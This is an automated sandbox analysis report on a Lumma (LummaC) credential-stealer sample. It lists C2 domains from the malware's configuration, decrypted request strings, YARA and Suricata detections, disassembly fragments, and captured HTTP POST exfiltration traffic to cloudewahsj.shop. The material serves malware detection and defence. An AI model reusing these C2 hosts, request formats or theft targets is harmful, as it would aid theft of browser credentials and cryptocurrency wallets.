Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rdFy6abQ61.exe

Overview

General Information

Sample name:rdFy6abQ61.exe
renamed because original name is a hash value
Original sample name:7a3e26158d0bf299838749875feb6232.exe
Analysis ID:1584182
MD5:7a3e26158d0bf299838749875feb6232
SHA1:7ceb291dc9521d49d1e215af7b60b4de187d08d2
SHA256:ad94f681001f2a56ca7bf4396b78e119ba71acca6f14ef6eed2ef54502246985
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rdFy6abQ61.exe (PID: 3916 cmdline: "C:\Users\user\Desktop\rdFy6abQ61.exe" MD5: 7A3E26158D0BF299838749875FEB6232)
    • WerFault.exe (PID: 3228 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1856 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["noisycuttej.shop", "rabidcowse.shop", "wholersorie.shop", "cloudewahsj.shop", "nearycrepso.shop", "framekgirus.shop", "tirepublicerj.shop", "abruptyopsn.shop"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      Process Memory Space: rdFy6abQ61.exe PID: 3916JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: rdFy6abQ61.exe PID: 3916JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: rdFy6abQ61.exe PID: 3916JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            Click to see the 1 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-04T15:31:55.839962+010020283713Unknown Traffic192.168.2.449731104.21.96.1443TCP
            2025-01-04T15:31:56.810219+010020283713Unknown Traffic192.168.2.449732104.21.96.1443TCP
            2025-01-04T15:31:58.142436+010020283713Unknown Traffic192.168.2.449733104.21.96.1443TCP
            2025-01-04T15:31:59.355446+010020283713Unknown Traffic192.168.2.449734104.21.96.1443TCP
            2025-01-04T15:32:01.043748+010020283713Unknown Traffic192.168.2.449735104.21.96.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-04T15:31:56.313636+010020546531A Network Trojan was detected192.168.2.449731104.21.96.1443TCP
            2025-01-04T15:31:57.341526+010020546531A Network Trojan was detected192.168.2.449732104.21.96.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-04T15:31:56.313636+010020498361A Network Trojan was detected192.168.2.449731104.21.96.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-04T15:31:57.341526+010020498121A Network Trojan was detected192.168.2.449732104.21.96.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-04T15:31:55.839962+010020586071Domain Observed Used for C2 Detected192.168.2.449731104.21.96.1443TCP
            2025-01-04T15:31:56.810219+010020586071Domain Observed Used for C2 Detected192.168.2.449732104.21.96.1443TCP
            2025-01-04T15:31:58.142436+010020586071Domain Observed Used for C2 Detected192.168.2.449733104.21.96.1443TCP
            2025-01-04T15:31:59.355446+010020586071Domain Observed Used for C2 Detected192.168.2.449734104.21.96.1443TCP
            2025-01-04T15:32:01.043748+010020586071Domain Observed Used for C2 Detected192.168.2.449735104.21.96.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-04T15:31:55.180569+010020586061Domain Observed Used for C2 Detected192.168.2.4554981.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-04T15:31:58.815163+010020480941Malware Command and Control Activity Detected192.168.2.449733104.21.96.1443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: rdFy6abQ61.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://cloudewahsj.shop/apiAvira URL Cloud: Label: malware
            Source: https://cloudewahsj.shop/apiPAvira URL Cloud: Label: malware
            Source: https://cloudewahsj.shop/apilAvira URL Cloud: Label: malware
            Source: https://cloudewahsj.shop/apieAvira URL Cloud: Label: malware
            Source: https://cloudewahsj.shop/Avira URL Cloud: Label: malware
            Source: https://cloudewahsj.shop/CAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 0.2.rdFy6abQ61.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "rabidcowse.shop", "wholersorie.shop", "cloudewahsj.shop", "nearycrepso.shop", "framekgirus.shop", "tirepublicerj.shop", "abruptyopsn.shop"], "Build id": "4h5VfH--"}
            Multi AV Scanner detection for submitted file
            Source: rdFy6abQ61.exeReversingLabs: Detection: 39%
            Source: rdFy6abQ61.exeVirustotal: Detection: 48%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Machine Learning detection for sample
            Source: rdFy6abQ61.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
            Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00415D89 CryptUnprotectData,0_2_00415D89

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeUnpacked PE file: 0.2.rdFy6abQ61.exe.400000.0.unpack
            Source: rdFy6abQ61.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]0_2_00441816
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov eax, esi0_2_0043D0D0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]0_2_0043D0D0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]0_2_0040C080
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00422370
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov word ptr [edx], cx0_2_00418BA2
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]0_2_00417054
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]0_2_0041B021
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0041B021
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]0_2_004438E0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]0_2_004438F9
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]0_2_004438FB
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]0_2_00422880
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ebx, bx0_2_00427885
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]0_2_0041F170
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov dword ptr [ebp-2Ch], eax0_2_004421E9
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov byte ptr [edi+10h], 00000000h0_2_004421E9
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ebx, byte ptr [esi]0_2_0041618C
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h0_2_0041BA52
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov esi, ecx0_2_0041BA52
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0041BA52
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh0_2_00402210
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0043A230
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, word ptr [eax]0_2_004442E0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00431AF5
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]0_2_0040B280
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h0_2_00440A90
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]0_2_00441B50
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_00409360
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042FB7D
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx eax, byte ptr [ecx+edi]0_2_00408320
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_00419B30
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_0041F3E0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0041B3F2
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov ecx, eax0_2_0041AB90
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then jmp ecx0_2_00428C62
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov ecx, eax0_2_00427C10
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh0_2_00444C20
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]0_2_00414C30
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov ecx, eax0_2_00418492
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, word ptr [ebx]0_2_0043CD40
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0042C5E0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0041B58F
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_004195B6
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_004195B6
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov edi, edx0_2_0043E6E0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx eax, word ptr [edx]0_2_0043E6E0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov ecx, edx0_2_00430F4E
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov ecx, edx0_2_00430F54
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_0041A770
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov ecx, edx0_2_00430F03
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042F716
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00407730
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00407730
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]0_2_00427FC0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]0_2_00427FC0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]0_2_004437D0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]0_2_0042A7F0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov edx, ecx0_2_0042A7F0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov ecx, eax0_2_00427FFD
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov edx, ecx0_2_0042AF92
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0042AF92
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov edx, ecx0_2_0042AFB0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]0_2_020F5202
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov word ptr [edx], cx0_2_020F921E
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0210B247
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov ecx, eax0_2_02108264
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]0_2_020FB288
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_020FB288
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]0_2_0210829E
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]0_2_020F72BB
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]0_2_020EC2E7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]0_2_02102AE7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ebx, bx0_2_02107B02
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov eax, esi0_2_0211D337
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]0_2_0211D337
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]0_2_020FF3D7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_020F981D
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_020F981D
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0210C847
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov ecx, eax0_2_020F886C
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_020E7997
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_020E7997
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_020FA9D7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_020FF647
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov byte ptr [esi], al0_2_020FB659
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov ecx, eax0_2_02107E77
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]0_2_02108677
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh0_2_02124E87
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then jmp ecx0_2_02108EB2
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov edx, ecx0_2_0210AF50
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then cmp al, 20h0_2_020E275E
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov byte ptr [esi], al0_2_020FB7F6
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh0_2_020E2477
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]0_2_0210AC89
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h0_2_020FBCB9
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov esi, ecx0_2_020FBCB9
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_020FBCB9
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h0_2_02120CF7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]0_2_020EB4E7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov edi, dword ptr [esp+18h]0_2_020F5527
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx edx, word ptr [eax]0_2_02124547
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then movzx eax, byte ptr [ecx+edi]0_2_020E8587
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov word ptr [eax], cx0_2_021025D7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_020E95C7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 4x nop then mov ecx, eax0_2_020FADF7

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2058606 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) : 192.168.2.4:55498 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.4:49735 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.4:49734 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.4:49731 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.4:49733 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.4:49732 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49733 -> 104.21.96.1:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: noisycuttej.shop
            Source: Malware configuration extractorURLs: rabidcowse.shop
            Source: Malware configuration extractorURLs: wholersorie.shop
            Source: Malware configuration extractorURLs: cloudewahsj.shop
            Source: Malware configuration extractorURLs: nearycrepso.shop
            Source: Malware configuration extractorURLs: framekgirus.shop
            Source: Malware configuration extractorURLs: tirepublicerj.shop
            Source: Malware configuration extractorURLs: abruptyopsn.shop
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.96.1:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cloudewahsj.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: cloudewahsj.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H7RLDH9T1ERKF0YD9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18152Host: cloudewahsj.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MTFSOTV1TW6P64QDEZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: cloudewahsj.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MQVHS5L6YALPSOFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20414Host: cloudewahsj.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: cloudewahsj.shop
